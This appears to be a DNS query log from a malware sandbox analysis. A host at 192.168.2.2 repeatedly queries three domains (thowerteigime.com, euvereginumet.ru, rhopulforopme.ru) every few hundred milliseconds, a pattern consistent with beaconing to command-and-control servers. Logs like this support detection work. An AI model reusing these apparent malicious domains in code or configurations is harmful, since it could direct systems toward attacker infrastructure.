                        Apr 26, 2023 12:40:13.457372904 CEST192.168.2.21.1.1.10x1198Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:13.485747099 CEST192.168.2.21.1.1.10xb07Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:13.516484976 CEST192.168.2.21.1.1.10xc489Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:13.957051992 CEST192.168.2.21.1.1.10x28a0Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:13.981117964 CEST192.168.2.21.1.1.10x496dStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:14.003210068 CEST192.168.2.21.1.1.10xf527Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:14.394568920 CEST192.168.2.21.1.1.10x34cdStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:14.418606043 CEST192.168.2.21.1.1.10x116bStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:14.441267014 CEST192.168.2.21.1.1.10x46a0Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:14.790054083 CEST192.168.2.21.1.1.10xc83Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:14.816625118 CEST192.168.2.21.1.1.10x54d7Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:14.841154099 CEST192.168.2.21.1.1.10xbaf9Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:15.207267046 CEST192.168.2.21.1.1.10xa099Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:15.230241060 CEST192.168.2.21.1.1.10x4a0dStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:15.262383938 CEST192.168.2.21.1.1.10xebf4Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:15.640430927 CEST192.168.2.21.1.1.10xc34cStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:15.663048983 CEST192.168.2.21.1.1.10x2007Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:15.696077108 CEST192.168.2.21.1.1.10xf38cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:16.010699034 CEST192.168.2.21.1.1.10x5421Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:16.033881903 CEST192.168.2.21.1.1.10xfe40Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:16.063476086 CEST192.168.2.21.1.1.10xe79aStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:16.470576048 CEST192.168.2.21.1.1.10xce3bStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:16.498987913 CEST192.168.2.21.1.1.10x87bbStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:16.526580095 CEST192.168.2.21.1.1.10xc04dStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:17.110639095 CEST192.168.2.21.1.1.10xa55eStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:17.139172077 CEST192.168.2.21.1.1.10x8d1Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:17.170927048 CEST192.168.2.21.1.1.10x547aStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:17.545774937 CEST192.168.2.21.1.1.10xae43Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:17.568429947 CEST192.168.2.21.1.1.10xf53dStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:17.591968060 CEST192.168.2.21.1.1.10x72b9Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:17.830442905 CEST192.168.2.21.1.1.10x349eStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:17.854576111 CEST192.168.2.21.1.1.10x2c6eStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:17.879076004 CEST192.168.2.21.1.1.10x2e95Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:18.386744976 CEST192.168.2.21.1.1.10x41fcStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:18.411845922 CEST192.168.2.21.1.1.10xebecStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:18.436532021 CEST192.168.2.21.1.1.10x4236Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:18.803253889 CEST192.168.2.21.1.1.10x83b2Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:18.827161074 CEST192.168.2.21.1.1.10x8d87Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:18.851217031 CEST192.168.2.21.1.1.10xd7baStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:19.087878942 CEST192.168.2.21.1.1.10x2e6dStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:19.110930920 CEST192.168.2.21.1.1.10x3dc3Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:19.137398005 CEST192.168.2.21.1.1.10x407dStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:19.685307026 CEST192.168.2.21.1.1.10xbbc2Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:19.711642027 CEST192.168.2.21.1.1.10x5faeStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:19.739865065 CEST192.168.2.21.1.1.10x8ba7Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:20.148256063 CEST192.168.2.21.1.1.10xea0aStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:20.178708076 CEST192.168.2.21.1.1.10xeb4dStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:20.202819109 CEST192.168.2.21.1.1.10x7e79Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:20.440685034 CEST192.168.2.21.1.1.10xe0d6Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:20.466269970 CEST192.168.2.21.1.1.10x5a51Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:20.488698959 CEST192.168.2.21.1.1.10x2392Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:21.064990997 CEST192.168.2.21.1.1.10xfda6Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:21.090697050 CEST192.168.2.21.1.1.10xdc41Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:21.118252039 CEST192.168.2.21.1.1.10x6539Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:21.622955084 CEST192.168.2.21.1.1.10x5ed9Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:21.646455050 CEST192.168.2.21.1.1.10xbccdStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:21.713383913 CEST192.168.2.21.1.1.10xcb92Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:21.960810900 CEST192.168.2.21.1.1.10x3a20Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:21.987705946 CEST192.168.2.21.1.1.10x4a27Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:22.010014057 CEST192.168.2.21.1.1.10x45c3Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:22.685518980 CEST192.168.2.21.1.1.10x9da2Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:22.710843086 CEST192.168.2.21.1.1.10x193Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:22.735960960 CEST192.168.2.21.1.1.10xc99aStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:23.376019001 CEST192.168.2.21.1.1.10xe62Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:23.404798031 CEST192.168.2.21.1.1.10x6a20Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:23.428817987 CEST192.168.2.21.1.1.10x35a9Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:23.842125893 CEST192.168.2.21.1.1.10xc4eaStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:23.867847919 CEST192.168.2.21.1.1.10x3fbfStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:23.893924952 CEST192.168.2.21.1.1.10x66ccStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:24.439122915 CEST192.168.2.21.1.1.10x9463Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:24.463751078 CEST192.168.2.21.1.1.10xce5cStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:24.488096952 CEST192.168.2.21.1.1.10x8363Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:25.015186071 CEST192.168.2.21.1.1.10xe476Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:25.042479992 CEST192.168.2.21.1.1.10x36d3Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:25.073407888 CEST192.168.2.21.1.1.10x4878Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:25.504021883 CEST192.168.2.21.1.1.10xad5Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:25.526691914 CEST192.168.2.21.1.1.10xcdf4Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:25.550834894 CEST192.168.2.21.1.1.10xab95Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:26.159024954 CEST192.168.2.21.1.1.10x8948Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:26.182560921 CEST192.168.2.21.1.1.10xabf8Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:26.211148024 CEST192.168.2.21.1.1.10x3a0Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:26.710661888 CEST192.168.2.21.1.1.10xd666Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:26.734992981 CEST192.168.2.21.1.1.10xa40aStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:26.772490978 CEST192.168.2.21.1.1.10xccaeStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:27.125998020 CEST192.168.2.21.1.1.10xbdc6Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:27.148395061 CEST192.168.2.21.1.1.10x931fStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:27.171211958 CEST192.168.2.21.1.1.10xed97Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:27.708872080 CEST192.168.2.21.1.1.10x7fa5Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:27.734610081 CEST192.168.2.21.1.1.10x35fdStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:27.758219004 CEST192.168.2.21.1.1.10x1d67Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:28.181953907 CEST192.168.2.21.1.1.10x511eStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:28.206552029 CEST192.168.2.21.1.1.10x988fStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:28.230540037 CEST192.168.2.21.1.1.10x68f2Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:28.474560022 CEST192.168.2.21.1.1.10xc228Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:28.497653961 CEST192.168.2.21.1.1.10xc91aStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:28.520562887 CEST192.168.2.21.1.1.10xbcaeStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:28.984071016 CEST192.168.2.21.1.1.10xaed0Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:29.007978916 CEST192.168.2.21.1.1.10x641eStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:29.035300016 CEST192.168.2.21.1.1.10x85cdStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:29.541404963 CEST192.168.2.21.1.1.10x4e1bStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:29.565109968 CEST192.168.2.21.1.1.10x5286Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:29.589232922 CEST192.168.2.21.1.1.10x10b6Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:29.983516932 CEST192.168.2.21.1.1.10xef08Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:30.111429930 CEST192.168.2.21.1.1.10xd5e4Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:30.137455940 CEST192.168.2.21.1.1.10x56ffStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:30.418673992 CEST192.168.2.21.1.1.10xc6c9Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:30.441540003 CEST192.168.2.21.1.1.10x95c5Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:30.464087963 CEST192.168.2.21.1.1.10xce51Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:30.779587030 CEST192.168.2.21.1.1.10x6c15Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:30.805891037 CEST192.168.2.21.1.1.10xf223Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:30.832779884 CEST192.168.2.21.1.1.10xed4dStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:31.118180037 CEST192.168.2.21.1.1.10x1ce4Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:31.140866041 CEST192.168.2.21.1.1.10x8ef5Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:31.180767059 CEST192.168.2.21.1.1.10xf0c7Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:31.541749954 CEST192.168.2.21.1.1.10x65e9Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:31.567431927 CEST192.168.2.21.1.1.10x9c36Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:31.595216990 CEST192.168.2.21.1.1.10xe798Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:31.909266949 CEST192.168.2.21.1.1.10xd9f9Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:31.932838917 CEST192.168.2.21.1.1.10xd559Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:31.958781004 CEST192.168.2.21.1.1.10xe38fStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:32.265667915 CEST192.168.2.21.1.1.10xa5afStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:32.289447069 CEST192.168.2.21.1.1.10x2ccaStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:32.316984892 CEST192.168.2.21.1.1.10xef73Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:32.671447039 CEST192.168.2.21.1.1.10x7b0bStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:32.695249081 CEST192.168.2.21.1.1.10xa257Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:32.722840071 CEST192.168.2.21.1.1.10x71f3Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:33.045428991 CEST192.168.2.21.1.1.10xfbc0Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:33.069462061 CEST192.168.2.21.1.1.10x89a5Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:33.097723961 CEST192.168.2.21.1.1.10x5024Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:33.397084951 CEST192.168.2.21.1.1.10xe042Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:33.436820030 CEST192.168.2.21.1.1.10x4dcbStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:33.469172955 CEST192.168.2.21.1.1.10x5eStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:33.785164118 CEST192.168.2.21.1.1.10x5599Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:33.814142942 CEST192.168.2.21.1.1.10x376dStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:33.843358994 CEST192.168.2.21.1.1.10x967aStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:34.172050953 CEST192.168.2.21.1.1.10xc081Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:34.195338011 CEST192.168.2.21.1.1.10xb027Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:34.219078064 CEST192.168.2.21.1.1.10x27cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:34.459341049 CEST192.168.2.21.1.1.10xaa24Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:34.531223059 CEST192.168.2.21.1.1.10x578Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:34.554574013 CEST192.168.2.21.1.1.10x57f7Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:34.873024940 CEST192.168.2.21.1.1.10x1d14Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:34.895971060 CEST192.168.2.21.1.1.10xc69Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:34.921793938 CEST192.168.2.21.1.1.10x276aStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:35.216314077 CEST192.168.2.21.1.1.10x427bStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:35.241005898 CEST192.168.2.21.1.1.10xc34cStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:35.263521910 CEST192.168.2.21.1.1.10xc44eStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:35.573321104 CEST192.168.2.21.1.1.10x3d6Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:35.598959923 CEST192.168.2.21.1.1.10x2824Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:35.659526110 CEST192.168.2.21.1.1.10x85f0Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:35.997842073 CEST192.168.2.21.1.1.10x4848Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:36.022722006 CEST192.168.2.21.1.1.10x4246Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:36.049016953 CEST192.168.2.21.1.1.10x8a16Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:36.363250971 CEST192.168.2.21.1.1.10x89dStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:36.386097908 CEST192.168.2.21.1.1.10x346eStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:36.413712978 CEST192.168.2.21.1.1.10xe143Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:36.716461897 CEST192.168.2.21.1.1.10xf38aStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:36.743735075 CEST192.168.2.21.1.1.10x5b98Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:36.766382933 CEST192.168.2.21.1.1.10x7812Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:37.087953091 CEST192.168.2.21.1.1.10x7fc2Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:37.111561060 CEST192.168.2.21.1.1.10xf058Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:37.133858919 CEST192.168.2.21.1.1.10x4a44Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:37.432924986 CEST192.168.2.21.1.1.10xbe3eStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:37.455626965 CEST192.168.2.21.1.1.10xc623Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:37.478372097 CEST192.168.2.21.1.1.10xb642Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:37.793977976 CEST192.168.2.21.1.1.10x6c8bStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:37.817713976 CEST192.168.2.21.1.1.10x4b42Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:37.843434095 CEST192.168.2.21.1.1.10x6de9Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:38.163031101 CEST192.168.2.21.1.1.10x8df9Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:38.188802958 CEST192.168.2.21.1.1.10xd479Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:38.212096930 CEST192.168.2.21.1.1.10x8cedStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:38.534480095 CEST192.168.2.21.1.1.10x2ecfStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:38.559514046 CEST192.168.2.21.1.1.10xad07Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:38.582621098 CEST192.168.2.21.1.1.10x605cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:39.069262028 CEST192.168.2.21.1.1.10xfbd6Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:39.092129946 CEST192.168.2.21.1.1.10x815fStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:39.122145891 CEST192.168.2.21.1.1.10xafc4Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:39.548624992 CEST192.168.2.21.1.1.10x20a3Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:39.579273939 CEST192.168.2.21.1.1.10x3bcaStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:39.605248928 CEST192.168.2.21.1.1.10xed6dStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:39.955615044 CEST192.168.2.21.1.1.10xa85dStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:39.984989882 CEST192.168.2.21.1.1.10x1094Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.007111073 CEST192.168.2.21.1.1.10xb12Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.336962938 CEST192.168.2.21.1.1.10xc809Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.360240936 CEST192.168.2.21.1.1.10xa424Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.383579969 CEST192.168.2.21.1.1.10x8a9cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.720757008 CEST192.168.2.21.1.1.10x9382Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.744604111 CEST192.168.2.21.1.1.10x37b9Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.769809961 CEST192.168.2.21.1.1.10xe1d1Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.072154999 CEST192.168.2.21.1.1.10xa9c2Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.095736027 CEST192.168.2.21.1.1.10xe031Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.117832899 CEST192.168.2.21.1.1.10xc2dStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.425863028 CEST192.168.2.21.1.1.10x5117Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.451361895 CEST192.168.2.21.1.1.10xc41aStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.474431992 CEST192.168.2.21.1.1.10x7d31Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.785420895 CEST192.168.2.21.1.1.10xdd8bStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.808288097 CEST192.168.2.21.1.1.10x231aStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.835091114 CEST192.168.2.21.1.1.10xcf0cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.194823027 CEST192.168.2.21.1.1.10xc2ebStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.223387003 CEST192.168.2.21.1.1.10xa6fdStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.251871109 CEST192.168.2.21.1.1.10x8f9eStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.564302921 CEST192.168.2.21.1.1.10xf76aStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.587713003 CEST192.168.2.21.1.1.10xb0adStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
